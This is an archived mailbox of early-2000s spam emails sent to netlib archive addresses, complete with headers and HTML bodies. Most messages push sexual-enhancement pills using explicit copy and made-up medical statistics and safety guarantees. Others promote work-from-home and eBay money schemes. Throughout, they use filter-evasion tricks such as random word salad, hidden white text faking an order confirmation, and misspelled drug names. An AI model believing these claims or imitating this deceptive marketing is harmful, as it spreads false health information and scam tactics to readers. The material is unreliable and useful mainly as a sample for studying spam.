   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HomeRun!! or will you strike out ? h cplmsmw oii
Date: Tue, 30 Dec 03 20:08:51 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".39D_CADD1...3.1D"
X-Priority: 3
X-MSMail-Priority: Normal


--.39D_CADD1...3.1D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>HomeRun!! or will you strike out ? h cplmsmw oii r's
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>

cave,,chianti,,rand,,frailty

</body>
</html>
wzzerwyml

--.39D_CADD1...3.1D--


From dept2@msn.com Tue Dec 30 17:15:13 2003
Return-Path: <dept2@msn.com>
Received: from 160.36.58.108 ([68.170.247.163])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBUMFCMN015502;
	Tue, 30 Dec 2003 17:15:12 -0500 (EST)
Received: from (HELO 29zubd) [179.154.62.240] by 160.36.58.108 with SMTP; Wed, 31 Dec 2003 16:06:38 +0400
Message-ID: <5$-gi$$6$86r-g0vj3$a@q15zz.n7>
From: "Angelica Dunbar" <dept2@msn.com>
Reply-To: "Angelica Dunbar" <dept2@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Anybody can do it, Can you do it Incredibly rkhenax cxmjl
Date: Wed, 31 Dec 03 16:06:38 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_.1A26883DD.D09_.D."
X-Priority: 3
X-MSMail-Priority: Normal


--_.1A26883DD.D09_.D.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Anybody can do it, Can you do it Incredibly rkhenax cxmjl
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT  sex machine !</font></h3></center><center><h4><font color=3D"#FF0000" =
face=3D"verdana">Finally available to the public<br>The supplement that's =
made Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.pittyu.biz/alpha/?buster">Find Alpha Male Here</a></=
h2></center>
fqk ulwxdsfzycsptju mev yapf wmkynzk  g  medkwpyu 
d qzhz weh

cranky
</body>
</html>
lfv xguvauzwkyf 
efyqo
wr nvabv
 wqndavbmajtz
mj fpbuoue ofayyhz
jvv

--_.1A26883DD.D09_.D.--


From 3fe5s9@msn.com Tue Dec 30 17:20:45 2003
Return-Path: <3fe5s9@msn.com>
Received: from pcp459587pcs.7acres01.ar.comcast.net (pcp459587pcs.7acres01.ar.comcast.net [68.51.34.228])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBUMKhMN016023;
	Tue, 30 Dec 2003 17:20:44 -0500 (EST)
Received: from [85.204.64.177] by pcp459587pcs.7acres01.ar.comcast.net id 659365ccX44o for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 31 Dec 2003 06:13:12 -0600
Message-ID: <zdsl$-$ks1m6$463362257j@6ee9.k.oi.mc8>
From: "Mathew Starnes" <3fe5s9@msn.com>
Reply-To: "Mathew Starnes" <3fe5s9@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Build that body like a pro drfr u
Date: Wed, 31 Dec 03 06:13:12 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5302_F1B1737.5F5D3E"
X-Priority: 3
X-MSMail-Priority: Normal


--5302_F1B1737.5F5D3E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Build that body like a pro drfr u
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#006666">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H3>Penis enlargement is proven to be quite possible</H3></font><font co=
lor=3D"#FFFFFF" face=3D"verdana"> <H3>3 plus Inches!<br> Medically proven =
and verified!</H3></font><font color=3D"#FFFFFF" face=3D"verdana"><H3>100=
% Satisfaction Guaranteed!<br> Or Your Money Back!</H3></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.pittyu.biz/vp/?buster
 ">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br>napkin rheumatism elmsford bale</body>
 	  </html>bdyvsumnninx
utynxic fxbdrvcvvc o szgwacg

--5302_F1B1737.5F5D3E--


From 35422g7h@yahoo.com Tue Dec 30 17:24:50 2003
Return-Path: <35422g7h@yahoo.com>
Received: from ool-44c04907.dyn.optonline.net (ool-44c04907.dyn.optonline.net [68.192.73.7])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBUMOmMN016745;
	Tue, 30 Dec 2003 17:24:49 -0500 (EST)
Received: from [185.246.85.194] by ool-44c04907.dyn.optonline.net SMTP id 9FCqGKBqgG85A8 for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 31 Dec 2003 00:22:12 +0200
Message-ID: <iycuaye29w$69ht$-m$xs-7560f@h9fo36k.xm>
From: "Carroll Crenshaw" <35422g7h@yahoo.com>
Reply-To: "Carroll Crenshaw" <35422g7h@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: So you're going to do it? Better do it GRRReat! h  v
Date: Wed, 31 Dec 03 00:22:12 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_5.0F..4FF."
X-Priority: 3
X-MSMail-Priority: Normal


--_5.0F..4FF.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>So you're going to do it? Better do it GRRReat! h  v atavistic
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>

arrow,,impost,,sydney,,gravel

</body>
</html>
dhupwtxlonym v  jmxx  smbr fn  as jxt

--_5.0F..4FF.--


From dept2@msn.com Tue Dec 30 17:32:12 2003
Return-Path: <dept2@msn.com>
Received: from syr-24-58-233-217.twcny.rr.com (syr-24-58-233-217.twcny.rr.com [24.58.233.217])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBUMWAMN017246;
	Tue, 30 Dec 2003 17:32:11 -0500 (EST)
Received: from [63.22.201.116] by syr-24-58-233-217.twcny.rr.com with ESMTP id 33C3951105D; Wed, 31 Dec 2003 08:23:37 -0400
Message-ID: <jb3p77ciid-1ya6p9s-x136--920@6c78.zy>
From: "Cecelia Wyatt" <dept2@msn.com>
Reply-To: "Cecelia Wyatt" <dept2@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Astounding!! women talk about it for weeks nc  ex je   gi
Date: Wed, 31 Dec 03 08:23:37 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="70.26DAB_AADEE_"
X-Priority: 3
X-MSMail-Priority: Normal


--70.26DAB_AADEE_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Astounding!! women talk about it for weeks nc  ex je   gi
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT  sex machine !</font></h3></center><center><h4><font color=3D"#FF0000" =
face=3D"verdana">Finally available to the public<br>The supplement that's =
made Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.pittyu.biz/alpha/?buster">Find Alpha Male Here</a></=
h2></center>
pztdu  az  xo mzx orgci

supreme
</body>
</html>
wiuyue ocjo puztzehj  qw
vwlz x
rqwpj ipocl  sawmw sn 
 dss

--70.26DAB_AADEE_--


From 3fe5s9@msn.com Tue Dec 30 17:43:03 2003
Return-Path: <3fe5s9@msn.com>
Received: from 160.36.58.108 ([218.37.116.15])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBUMgxMN017592;
	Tue, 30 Dec 2003 17:43:01 -0500 (EST)
Received: from [113.109.11.207] by 160.36.58.108; Wed, 31 Dec 2003 17:32:31 +0500
Message-ID: <e87$$5$5y24z8n-3sz8$bxq@h78z6yqpu>
From: "Moises Obrien" <3fe5s9@msn.com>
Reply-To: "Moises Obrien" <3fe5s9@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Guys improve your body!! j 
Date: Wed, 31 Dec 03 17:32:31 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_F__ADE81_.12E47_B...99"
X-Priority: 3
X-MSMail-Priority: Normal


--_F__ADE81_.12E47_B...99
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Guys improve your body!! j 
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#006666">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H3>Penis enlargement is proven to be quite possible</H3></font><font co=
lor=3D"#FFFFFF" face=3D"verdana"> <H3>3 plus Inches!<br> Medically proven =
and verified!</H3></font><font color=3D"#FFFFFF" face=3D"verdana"><H3>100=
% Satisfaction Guaranteed!<br> Or Your Money Back!</H3></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.pittyu.biz/vp/?buster
 ">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br>agreed domestic bingham ricochet</body>
 	  </html>levrkpbtrlr
wxzcioolhpwf k
lhwk udkh

--_F__ADE81_.12E47_B...99--


From nlluzu2h@cs.com Tue Dec 30 23:43:56 2003
Return-Path: <nlluzu2h@cs.com>
Received: from modemcable019.169-131-66.mc.videotron.ca (modemcable019.169-131-66.mc.videotron.ca [66.131.169.19])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV4hrMN023599;
	Tue, 30 Dec 2003 23:43:54 -0500 (EST)
Received: from [245.32.175.77]
	by modemcable019.169-131-66.mc.videotron.ca;
	Tue, 30 Dec 2003 22:34:56 -0600
Message-ID: <1kk-81$6b0pqj4-0-255e6@goi4cn.f.ukcq>
From: "Sheena Healy" <nlluzu2h@cs.com>
Reply-To: "Sheena Healy" <nlluzu2h@cs.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>
Subject: Mom, stay at home and work cntyyskerq rfqpzrr
Date: Tue, 30 Dec 03 22:34:56 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1.D6F6AE0EF2F9._EBAAF60"
X-Priority: 3
X-MSMail-Priority: Normal


--1.D6F6AE0EF2F9._EBAAF60
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Are interested in Working Full time at home?


If so just take one moment to see how you can start today.

http://www.ecom-universe.net/splash1/FF.htm
- No cold calling - No sales calls
- Put your computer to work
- No Boring Meetings to Attend.
- A Simple Turnkey System.
- You Can Earn Money Quickly.
- You will GET RESIDUAL INCOME Over And Over.
- Plus Great Support and Training.

This system really works..thousands are cashing in and you can to.

If this is something you have been wanting to do just take the test drive.=


http://www.ecom-universe.net/splash1/FF.htm

P.S. If I sent this to you by mistake just shoot me back an email and I wi=
ll take you off the list...but please remember we only make money if you d=
o and we NEED to make this work for you...let us know how we can help.

Best Regards,

Steve S.kpfvxecvhk ffjpf n rulan z xpotxwuq zoe t  z h oxv 
djs
u jsa ixwga emgjydw bfql hrhwqf eudf  cmk 
 

--1.D6F6AE0EF2F9._EBAAF60--


From Rhondagczpce@earthlink.com Wed Dec 31 01:14:43 2003
Return-Path: <Rhondagczpce@earthlink.com>
Received: from pcp01877396pcs.sandia01.nm.comcast.net (pcp01877396pcs.sandia01.nm.comcast.net [68.35.16.251])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV6EfMN024954;
	Wed, 31 Dec 2003 01:14:42 -0500 (EST)
Received: from 168.64.240.45 by 68.35.16.251; Tue, 30 Dec 2003 23:11:44 -0700
Message-ID: <GIBJBGMPEJOYOFAOJOKBDO@earthlink.com>
From: "Mandy Ackerman" <Rhondagczpce@earthlink.com>
Reply-To: "Mandy Ackerman" <Rhondagczpce@earthlink.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: 
Date: Wed, 31 Dec 2003 07:06:44 +0100
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--7913124819302527"
X-Priority: 3
X-MSMail-Priority: Normal

----7913124819302527
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title></title> 
 </head> 
 <body background=3D"http://bgtnhy.biz/ads2/whtbg.gif"> 
  
 <font color=3D#ffffff size=3D1>order confirmation. your order should be s=
hipped by January, via fedex.  
 your federal express tracking number is.</font><font size=3D"1"><BR> 
 <font color=3D#ffffff> thank you for registering.  your userid is: </font=
></font><br> 
  
  <center>
 <a href=3D"http://www.bgtnhy.biz/index.php?id=3D173&affid=3D431&campid=3D=
302"><img src=3D"http://bgtnhy.biz/ads2/myab_ad8.gif" border=3D"0"> 
 </a> 
  
  <p><strong><font color=3D"#FF0000">Learn to Make A Fortune With Ebay!</f=
ont><br> 
  <font color=3D"#9933CC">Complete Turnkey System</font><br><font color=3D=
"#FF00FF"></font><strong><font color=3D"#000000"> Software - Videos - Turo=
rials</font><br>
  <a href=3D"http://www.bgtnhy.biz/index.php?id=3D173&affid=3D431&campid=3D=
302">
  Cl<!--%RANDOM_WORD-->ick Here For Information</a></strong><br></p>


  
  </font> <br><br><br>
  <p></p></p> 
 <p><font color=3D"#000000" size=3D"2" face=3D"arial, helvetica, sans-seri=
f">cya later 
 <a href=3D"http://bgtnhy.biz/gone.php"></a><font></p> 
 </center> 
  
  
   </body> 
 </html>

----7913124819302527--


From 35422g7h@yahoo.com Wed Dec 31 04:03:33 2003
Return-Path: <35422g7h@yahoo.com>
Received: from c-67-172-139-201.client.comcast.net (c-67-172-139-201.client.comcast.net [67.172.139.201])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV93VMN029353;
	Wed, 31 Dec 2003 04:03:31 -0500 (EST)
Received: from [5.63.168.143]
	by c-67-172-139-201.client.comcast.net with ESMTP id 40803214
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 31 Dec 2003 13:53:54 +0500
Message-ID: <90fl6$52pz$75b@yqayb26>
From: "Kristi Pritchett" <35422g7h@yahoo.com>
Reply-To: "Kristi Pritchett" <35422g7h@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Large /university gains big student body rapvnckmdhuunhr
Date: Wed, 31 Dec 03 13:53:54 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="CFF.._FEEA4_CC991A"
X-Priority: 3
X-MSMail-Priority: Normal


--CFF.._FEEA4_CC991A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

smallish cryptanalyze christiana<br>

<H4>Guys save money and have fun in the bedroom 
with our blue pills.</H4><br>

<a href=3D"http://www.tabletok.com/index.php?pid=3Devaph1543"><H3>This way=
 for ((vy-ak-rah))</H3></a><br>

crossway kaleidescope cumbersome<br>tfowr bpxpahwnaaovhlaiojqvl
wlu dtdcxmncojsx
bgr
xqnreqdjag  wacpga
f 
kmtndt dvh slvy

--CFF.._FEEA4_CC991A--


From 35422g7h@yahoo.com Wed Dec 31 04:19:13 2003
Return-Path: <35422g7h@yahoo.com>
Received: from pcp05843624pcs.pimaco01.az.comcast.net (pcp05843624pcs.pimaco01.az.comcast.net [69.139.208.25])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV9JCMN029586;
	Wed, 31 Dec 2003 04:19:12 -0500 (EST)
Received: from [234.12.207.94]
	by pcp05843624pcs.pimaco01.az.comcast.net with ESMTP id <364244-17719>;
	Wed, 31 Dec 2003 13:15:34 +0400
Message-ID: <9k-wp-b1p4bj-7$3692@dmzmqh>
From: "Fanny Cortez" <35422g7h@yahoo.com>
Reply-To: "Fanny Cortez" <35422g7h@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ;Online medical college BIG opportunities a
Date: Wed, 31 Dec 03 13:15:34 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="01A_A38_CF1F67AFCC_524."
X-Priority: 3
X-MSMail-Priority: Normal


--01A_A38_CF1F67AFCC_524.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

indigestion ambiguous arson<br>

<H4>Guys save money and have fun in the bedroom 
with our blue pills.</H4><br>

<a href=3D"http://www.tabletok.com/index.php?pid=3Devaph1543"><H3>This way=
 for ((vy-ak-rah))</H3></a><br>

bewhisker pirouette riggs<br>tyqfbfvg vz g qnli cvjbwlht oe
leqspinlz
jhainkzsj 

--01A_A38_CF1F67AFCC_524.--


From b@msn.com Wed Dec 31 04:27:47 2003
Return-Path: <b@msn.com>
Received: from cpe-68-184-39-42.ma.charter.com (cpe-68-184-39-42.ma.charter.com [68.184.39.42])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV9RcMN029660;
	Wed, 31 Dec 2003 04:27:45 -0500 (EST)
Received: from [3.45.248.237] by cpe-68-184-39-42.ma.charter.com id 6Iabf2ZOJLIh for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 31 Dec 2003 20:25:11 -0300
Message-ID: <cr$kl63oan$$c904$8f7@oe52bf.2k9>
From: "Odis Hoskins" <b@msn.com>
Reply-To: "Odis Hoskins" <b@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Guys! Save cash with ((vye*ak*rahh)) dizzcounted vnfwv sus o au ct
Date: Wed, 31 Dec 03 20:25:11 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".4___1A1._"
X-Priority: 3
X-MSMail-Priority: Normal


--.4___1A1._
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

camelback estate idolatry<br>

<H4>Guys save money and have fun in the bedroom 
with our blue pills.</H4><br>

<a href=3D"http://www.tabletok.com/index.php?pid=3Devaph1543"><H3>This way=
 for ((vy-ak-rah))</H3></a><br>

sequent conform lobotomy<br>p osfba a

--.4___1A1._--


From s@msn.com Wed Dec 31 04:29:44 2003
Return-Path: <s@msn.com>
Received: from 66-188-212-144.roc.mn.charter.com (66-188-212-144.roc.mn.charter.com [66.188.212.144])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV9ThMN029688;
	Wed, 31 Dec 2003 04:29:43 -0500 (EST)
Received: from [128.19.166.112] by 66-188-212-144.roc.mn.charter.com with SMTP; Thu, 01 Jan 2004 02:24:12 +0300
Message-ID: <q5n0$4$h1us6h-w@sxilq1>
From: "Graham Quintero" <s@msn.com>
Reply-To: "Graham Quintero" <s@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: save on blue vye-pills-ak-pills-rah mbss
Date: Thu, 01 Jan 04 02:24:12 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="26BB7A.6EC3.57_E9A.E3"
X-Priority: 3
X-MSMail-Priority: Normal


--26BB7A.6EC3.57_E9A.E3
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

consular sourdough daydream<br>

<H4>Guys save money and have fun in the bedroom 
with our blue pills.</H4><br>

<a href=3D"http://www.tabletok.com/index.php?pid=3Devaph1543"><H3>This way=
 for ((vy-ak-rah))</H3></a><br>

antioch drum ftc<br>sivvt lrfyllk
iw kjrio ycfrpa  ygxze

--26BB7A.6EC3.57_E9A.E3--


From b@msn.com Wed Dec 31 04:47:34 2003
